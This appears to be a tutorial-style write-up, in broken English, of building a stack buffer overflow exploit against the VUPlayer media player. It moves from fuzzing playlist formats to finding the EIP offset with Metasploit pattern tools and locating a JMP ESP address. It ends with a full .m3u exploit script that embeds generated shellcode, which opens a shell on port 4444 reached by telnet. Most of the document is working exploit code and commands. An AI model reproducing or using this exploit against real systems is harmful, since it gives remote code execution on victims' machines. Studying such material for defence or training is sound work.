Exploit VUPlayer

Buffer Overflow VUPlayer

A. Try

1. I try make fuzzer with format file .vpl

#!usr/bin/python

filename="error.vpl"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

2. run file python in terminal to make new file
3. run VUPlayer and load fuzzer with format file .vpl, aplication not crash and try buffer * until 2000 VUPlayer not crash too.
4. I try make fuzzer with format file .m3u

#!usr/bin/python

filename="error.m3u"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

5. run fuzzer in terminal to make new file .m3u.
6. run VUPlayer and load with fuzzer with format file .m3u same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
7. I try again make fuzzer with format file .pls.

#!usr/bin/python

filename="error.pls"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

8. run fuzzer in terminal to make file .pls
9. run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
10. I try again make fuzzer with format .asx

#!usr/bin/python

filename="error.asx”

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

11. run fuzzer in teminal to make file .asx
12. run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.
13. I try again make fuzzer with format .wax.

#!usr/bin/python

filename="error.wax"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

14. run fuzzer in terminal to make file.wax
15. run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
16. Make fuzzer with python language the useful make format file .cue.

#!usr/bin/python

filename="error.cue"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

17. run fuzzer on terminal to make file .cue
18. run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.

I try make result this case make way to buffer format file .m3u, .pls, .wax, but I choses format file is .m3u.

B. Show Process Debbugging

1. run aplication UVPlayer in Ollydbg for see the process and analisys the memory.

2. make dummies data structur with pattern create
   -open terminal and type the terminal :
   root@bt:~# cd /pentest/exploits/framework/tools/
   root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > error.txt

       -type in terminal : #kwrite error.txt

        case talked about the function show dummies string structure.

       -copy and paste value error.txt and modifiying the fuzzer

#!usr/bin/python

filename="error1.m3u"

buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

#buffer+="\x41" * 2000

file=open(filename,'w')

file.write(buffer)

file.close()

• run fuzzer after modification on terminal
• run UVPlayer on Ollydbg and load fuzzer modification and attention ESP memory and EIP memory.

3. count byte from pattern collection
   - type on terminal :
   root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 68423768
   1012

        in the case, EIP address at UVPlayer can overwrite is 1023,1024,1025    and 1016 because EIP address 4 byte only.

root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 8Bh9Bi
1016

4. proof the address EIP
   -modification the fuzzer
   #! usr/bin/python
   filename="error2.m3u"
   buffer="\x90" * 1012
   buffer+="\xEF\xBE\xAD\xDE"
   file=open(filename,'w')
   file.write(buffer)
   file.close()

• run UVPlayer on Ollydbg and load fuzzer

5. proof the ESP address
   - modification fuzzer
   #! usr/bin/python
   filename="error3.m3u"
   buffer+="\x90" * 1012
   buffer+="\xEF\xBE\xAD\xDE"
   buffer+="\x90" * (1016-len(buffer))
   buffer+="\xCC" * (2000-len(buffer))
   file=open(filename,'w')
   file.write(buffer)
   file.close()

• run UVPlayer again on Ollydbg and load the fuzzer

100. JMP ESP
     1. search JMP ESP
     - run VUPlayer on Ollydbg, click View menu chose menu executable modules. In Executable modules window, I chose with method double click shell32.dll. Show new window shell32.dll and click right main window → search for -->Command and type JMP ESP then press Find buttom.

2. proof JMP ESP
   - modification fuzzer

#! usr/bin/python

filename="error4.m3u"

buffer="\x90" * 1012

buffer+="\xD7\x30\x9D\x7C"

buffer+="\xCC" * (1016-len(buffer))

buffer+="\xCC" * (2000-len(buffer))

file=open(filename,'w')

file.write(buffer)

file.close()

• run aplication on Ollydbg and load fuzzer after modification

500. Payload
     1. make payload
     - run metasploit2 GUI in terminal, type :
     root@bt:~# cd /pentest/exploits/framework2/
     root@bt:/pentest/exploits/framework2# ./msfweb
     +----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

• open web broser and type :localhost:55555
  

  
• filter modules payload
• chose payload modules
• generate payload

2. modification fuzzer
   - copy and paste result generate payload from msfweb
   #! usr/bin/python
   filename="error5.m3u"
   buffer="\x90" * 1012
   buffer+="\xD7\x30\x9D\x7C"
   buffer+="\x90" * 32
   buffer+=("\xda\xd8\xbf\x29\xf7\x72\x58\x31\xc9\xd9\x74\x24\xf4\x58\xb1\x51"
   "\x83\xc0\x04\x31\x78\x13\x03\x51\xe4\x90\xad\x5d\x60\xbe\x03\x75"
   "\x8c\xbf\x63\x7a\x0f\xcb\xf0\xa0\xf4\x40\x4d\x94\x7f\x2a\x4b\x9c"
   "\x7e\x3c\xd8\x13\x99\x49\x80\x8b\x98\xa6\x76\x40\xae\xb3\x88\xb8"
   "\xfe\x03\x13\xe8\x85\x44\x50\xf7\x44\x8e\x94\xf6\x84\xe4\x53\xc3"
   "\x5c\xdf\xb3\x46\xb8\x94\x9b\x8c\x43\x40\x45\x47\x4f\xdd\x01\x08"
   "\x4c\xe0\xfe\xb5\x40\x69\x89\xd5\xbc\x71\xeb\xe6\x8c\x52\x8f\x63"
   "\xad\x54\xdb\x33\x3e\x1e\xab\xaf\x93\xab\x0c\xc7\xb5\xc3\x02\x99"
   "\x47\xf8\x4b\xda\x8e\x66\x3f\x42\x47\x54\x8d\xe2\xe0\xe9\xc3\xad"
   "\x5a\xf1\xf4\x39\xa8\xe0\x09\x82\x7e\x04\x27\xab\xf7\x1f\xae\xd2"
   "\xe5\xe8\x2d\x81\x9f\xea\xce\xf9\x08\x32\x39\x0c\x65\x93\xc5\x38"
   "\x25\x4f\x69\x97\x99\x2c\xde\x54\x4d\x4c\x30\x3c\x19\xa3\xed\xa6"
   "\x8a\x4a\xec\xb3\x45\xe9\xf5\xcb\x52\xa6\xf6\xfd\x37\x59\x58\x54"
   "\x37\x89\x32\xf2\x6a\x04\x2a\xad\x8b\x8f\xff\x04\x8b\xe0\x68\x43"
   "\x3a\x87\x20\xdc\x42\x51\xe2\xb6\xe8\x0b\xfc\xe6\x82\xdc\xe5\x7f"
   "\x63\x65\xbd\x80\xbd\xc3\xbe\xae\x24\x86\x24\x28\xc1\x35\xc8\x3d"
   "\xf4\xd0\x42\x64\xde\xe8\xea\x71\x4a\xb5\x65\x9f\xba\xf5\x85\xf5"
   "\x43\xb7\x44\xf7\xfe\x14\x04\x8a\x85\x5c\x81\x3f\xd2\xf5\xa7\xc1"
   "\x96\x10\xb7\x48\x9d\xe3\x91\xe9\x4a\x4e\x4f\x5c\x24\x04\x6e\x0f"
   "\x97\x8d\x21\x50\xc7\x46\x6f\x77\xed\x58\x3c\x78\x38\x0e\x3c\x79"
   "\xf2\x30\x12\x0e\xaa\x32\x10\xd4\x31\x34\xc1\x86\x46\x1a\x86\x58"
   "\x61\x79\x24\xf7\x6e\xa8\x34\x27")
   file=open(filename,'w')
   file.write(buffer)
   file.close()

• run VUPlayer not Ollydbg and load fuzzer
• run terminal on backtrack and connection, type :
  root@bt:~# telnet 192.168.56.101 4444

======GOOD LUCK========